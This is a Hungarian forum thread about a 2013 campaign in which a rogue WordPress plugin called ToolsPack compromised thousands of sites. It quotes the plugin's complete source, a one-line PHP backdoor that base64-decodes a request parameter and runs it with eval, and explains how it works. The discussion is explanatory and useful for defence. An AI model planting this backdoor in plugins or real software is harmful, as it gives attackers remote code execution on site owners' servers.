PC Fórum
  • Kisebb betűméret
  • Eredeti betűméret
  • Nagyobb betűméret
Több ezer WordPress oldal fertőződött meg
2013-09-02T17:42+01:00
Net.Elek
Net.ElekPC Fórum
regisztrált tag
Illetve nem is az hogy hogyan. A főbb kérdés az, hogy honnét. Mert ha Wp források közül az nagyon rémisztő. Ha ezt nem ellenőrizték, akkor vajon a többit hogyan ellenőrzik? És ha ilyen laza a kontroll, akkor vajon hány szándékosan káros kód található még a WP egyéb telepíthető moduljaiban.


ennyire hiszékenyek lennének az emberek?

ToolsPack. Milyen szép és hangzatos név. Ez biztos csak valami nagyon jó és trendi lehet. Ha nekem nincs ilyenem, akkor le vagyok maradva.
Mutasd a teljes hozzászólást!
"ennyire hiszékenyek lennének az emberek?"

Ha nem azok lennének, egyik politikai pártot sem választanák meg.
Mutasd a teljes hozzászólást!
Ez egy kifejezett támadásra kihegyezett kód.
Mondjuk az jó kérdés, hogy hogyan sikerült ezt telepíteni 30000 Wordpress-alapú oldalra - ennyire hiszékenyek lennének az emberek?
Mutasd a teljes hozzászólást!
Ha kap valamilyen úton-módon egy "e" nevű GET metódussal küldött URL-paramétert, POST metódussal küldött változót, vagy sütit ($_REQUEST), az abban levő base64-el kódolt értéket dekódolják (base64_decode) és végrehajtják, mint PHP-kódot (eval).


NA NEE!!!
Külső forrásból, vagy is POST -ból PHP kódot lefuttatja!?
Ez kb olyan mint hibás fékkel száguldozni!
Mutasd a teljes hozzászólást!
Ok'
Értem én, hogy benzin. De mitől megy?

Én a drupalhoz a kiegészítőket vagy a drupal.org-ról szerzem be. Oda ellenőrzött kódok kerülnek fel. A stabil és a fejlesztés alatt álló változatok is jól látható módon el vannak különítve. Ha nem akarsz valami nagyon extrát, akkor az alap majdhogy nem megfelel.

Egy szónak is száz a vége.
A sérülékenység legtöbb esetben a felhasználói figyelmetlenségben rejlik. És ezt ki is használják sokan. A legtöbb weblapépítő minden modult akar de egyszerre. És erre játszottak rá de nagyon. ToolsPack. Milyen szép és hangzatos név. Ez biztos csak valami nagyon jó és trendi lehet. Ha nekem nincs ilyenem, akkor le vagyok maradva. blablablablabla

Viszont ha kicsit megfordítjuk a dolgot.
A hír is kicsit arra hajaz, hogy lehúzza a WP-t.

egy sebezhetőség kihasználásával tömegesen támadták a WordPress alapú weboldalakat


Márpedig igazából nem a WP, hanem a ToolsPack plugin a sebezhető. A telepített kiegészítőn keresztül sebezhető a WP.
Mutasd a teljes hozzászólást!
"Pont most akartam WP alapon összerakni egy kisebb weblapot. Nem teszem. "
Azért érdemes utánaolvasni, milyen dolgok együttállása okozza az oldalak "eltérítését":
"Many of the blogs compromised in these recent attacks were running outdated WordPress versions, had vulnerable plug-ins installed or had weak administrative passwords susceptible to brute force attacks, said David Dede, a security researcher with website integrity monitoring firm Sucuri Security."
Forrás: Networkworld
Tehát:
- elavult Wordpress verzió
- gyenge, nyers erővel könnyen feltörhető adminisztratív-jelszó
- sérülékenységet tartalmazó kiegészítők

Ez utóbbira rá is erősítenek:
"Sucuri researchers have also been tracking this scareware distribution campaign and found that a rogue WordPress plug-in called ToolsPack has been installed on many of the compromised blogs."
Forrás: Networkworld

Tehát a kiegészítőben volt a sérülékenység. Még pedig milyen!
<?php
/*
Plugin Name: ToolsPack
Description: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!
Version: 1.2
Author: Mark Stain
Author URI: http://checkWPTools.com/
*/
$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;
?>
Forrás: sucuri.net

Mit is csinál a kód?
Ha kap valamilyen úton-módon egy "e" nevű GET metódussal küldött URL-paramétert, POST metódussal küldött változót, vagy sütit ($_REQUEST), az abban levő base64-el kódolt értéket dekódolják (base64_decode) és végrehajtják, mint PHP-kódot (eval).

Érdemes még megemlíteni, hogy a http://checkWPTools.com/ domain nincs beregisztrálva, az Internet Archive WayBack Machine szerint nem volt weboldal az adott domainen, ha rákeresünk Google-val a sérülékenységet boncolgató oldalakat találunk - szóval nem épp megbízható pluginról van szó.
Mutasd a teljes hozzászólást!
Ahogy nézem a linked a sebezhetőség három modult érint.
Aggregator
OpenID
File

Aggregator a fedeket biztosítja a hírcsatornáknak és ez alapértelmezésben ki van kapcsolva. OpenID is szükségtelen és kikapcsolt az alapértelmezése. A File modul nem része az alaprendszernek. Nélküle is van élet.

Illetve a sebezhetőség a 6.21/7.10 és előtti változatokat érinti. Jelenleg a legfrissebb a 6.25/7.12. Így aki odafigyel a rendszere frissen tartására, már nem érintett ebben a sebezhetőségben.
Mutasd a teljes hozzászólást!
Köszi a linket!
Pont most akartam WP alapon összerakni egy kisebb weblapot. Nem teszem. Maradok a bevált Drupalnál. Azt úgyis jobban kedvelem.

Mutasd a teljes hozzászólást!
Több ezer WordPress oldal fertőződött meg

Az említett PHP alapú ingyenes tartalomkezelő rendszer igen népszerű szerte a világon, ám most számos helyen a hamis antivírus áldozata lett. A kártevő terjesztők egy sebezhetőség kihasználásával tömegesen támadták a WordPress alapú weboldalakat...
Mutasd a teljes hozzászólást!